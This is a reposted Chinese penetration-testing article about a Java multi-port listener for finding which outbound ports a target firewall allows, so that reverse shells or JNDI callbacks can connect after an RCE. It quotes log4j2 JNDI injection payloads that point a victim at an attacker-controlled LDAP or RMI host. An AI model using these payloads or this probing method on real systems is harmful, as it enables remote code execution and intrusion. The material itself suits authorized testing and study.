快速探测目标防火墙出网端口的工具化实现

0x01 需求场景

在很多次攻防实战或者SRC挖掘过程中,碰到RCE想要反弹shell或者jndi注入时,只有dnslog会产生有效回连,自行nc监听的端口却毫无反应,这就可能遇到了目标防火墙限制出网端口的场景。dnslog是不限制出网端口的,所以不在本文的讨论范围之内,另外本文也不涉及讨论高版本JDK限制JNDI注入remote codebase的场景。书归正传,比如目标只限制80端口出网,但你nc监听的是80以外的端口(例如8080),那么这种情况下,反弹shell自然不可能成功。大部分人的解决方案是尝试使用 nc -vlp 常见端口号的方式进行尝试,例如80、443等。但是很多目标这些常见端口都不一定可以网络放行,基于这种情况下,可能判定目标机器不出网从而错失RCE的机会。

0x02 场景举例

就拿最近爆火的log4j2的RCE进行举例。
base payload大概是这样的

${jndi:ldap://dnslog地址:端口号/expclass}

由于ldap和rmi协议默认的端口号分别是1389和1099,所以大部分人的payload均为如下这样

${jndi:ldap://dnslog地址:1389/expclass}
${jndi:rmi://dnslog地址:1099/expclass}

但实际上很多企业的防火墙都会设置出网规则,只允许特定端口出网,尤其是一些云厂商就更为明确,因为其提供了防火墙面板

20211216112503-c1e9e58a-5e1f-1

企业可以更为方便的控制出入站规则。
上图为阿里云防火墙默认的出入站规则,可以看出为22、80、443等端口,并不包含1389、1099等端口。如果使用1389、1099等端口监听ldap、rmi服务,显而易见的可以得出不可能攻击成功的结论。
黑盒测试时不可能知道目标机器的防火墙规则,那么只得使用nc -lvp port在vps开启端口监听,配合burpsuite的repeater模块不停的尝试,每换一个端口就需要ctrl+c终止一下nc进程,再换下一个,简直是累得不要不要的。可能有人想问,nc难道不支持监听多个端口或者全端口吗?其实不少人问过这个问题,然而其实不支持。

20211216112528-d1272742-5e1f-1

想了想为了解决这个痛点问题,于是我使用java多线程写了一个可以同时开启多个端口的工具,哪一个端口产生了回连就打印一下日志。

0x03 核心实现

考虑到探测端口时,可能有两种需求场景。
第一种为大部分人的想法,我预判一些常见的出网端口,比如53、80、443、1521、3306等端口,工具也必须支持同时开启你预判的这些端口。
第二种需求,你使用了常见例如80、443等端口,依然没有产生有效回连,那么只能设置端口号的区间段了,比如8000-9000、50000-55000这些区间,观察日志打印,从而判断哪些端口可以出网。
java监听端口的核心代码为下文

InetAddress address = InetAddress.getByAddress(new byte[]{0,0,0,0});
  ServerSocket serverSocket = new ServerSocket((Integer) port,backlog,address);

这里的address为你需要监听的地址,由于某些VPS的奇特环境,如果你不主动添加监听地址,很可能会得到一个监听ip为127.0.0.1的监听实例。为了严谨性需要配合Java多线程去实现,一个线程专门用来监听一个端口号,考虑到VPS性能关系不建议同时开启监听2000以上的端口。贴一下完整的核心代码参考https://www.codeleading.com/article/22205653148/

package test0531;

import java.io.InputStream;
import java.net.ServerSocket;
import java.net.Socket;
import java.util.Arrays;
import java.util.List;

/**
 * @author zhongzhilong
 * @date 2021/5/31
 * @description 服务端同时监听多个端口
 */
public class ListenMorePortSocketServer {
    /**
     * 同时监听9088,9089端口
     */
    private final List<Integer> portList = Arrays.asList(9088, 9089);

    /**
     * 具体的业务逻辑
     */
    public void run() {
        for (Integer port : portList) {
            new Thread(new Runnable() {
                @Override
                public void run() {
                    try {
                        ServerSocket serverSocket = new ServerSocket(port);
                        System.out.println("服务端开始监听端口:" + port);
                        // 持续监听端口
                        while (true) {
                            // 阻塞直接监听到端口请求
                            Socket socket = serverSocket.accept();
                            socket.setKeepAlive(true);
                            int localPort = socket.getLocalPort();
                            System.out.println("当前请求服务器的端口号为:" + localPort);
                            while (!socket.isClosed()) {
                                InputStream is = socket.getInputStream();
                                byte[] bytes = new byte[1024];
                                is.read(bytes);
                                String msg = new String(bytes, "utf-8");
                                System.out.println("我是服务端,端口号为:" + localPort + "的客户端说:" + msg);
                            }
                            // socket.shutdownInput();
                            // is.close();
                            // socket.close();
                        }
                    } catch (Exception e) {
                        e.printStackTrace();
                    }
                }
            }).start();
        }
    }
}

0x04 工具化实现

最终实现的效果如下
启动页


快速探测目标防火墙出网端口的工具化实现

模式一:预判出网端口

20211216112608-e8f549f8-5e1f-1

模式二:端口区间模式

20211216112622-f0e93ec6-5e1f-1

也支持占用端口的检测,防止错过任何一个RCE的机会

20211216112636-f9ce01de-5e1f-1

0x05 参考

socket服务端同时监听多个端口号:https://www.codeleading.com/article/22205653148/
成品工具:请参考【漏洞百出】https://public.zsxq.com/groups/555848225184.html


转载自

https://xz.aliyun.com/t/10677

主题测试文章,只做测试使用。发布者:视频运营,转转请注明出处:https://community.anqiangkj.com/archives/7890

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022年3月16日 上午9:54
下一篇 2022年3月16日 上午10:36

相关推荐

发表回复

您的电子邮箱地址不会被公开。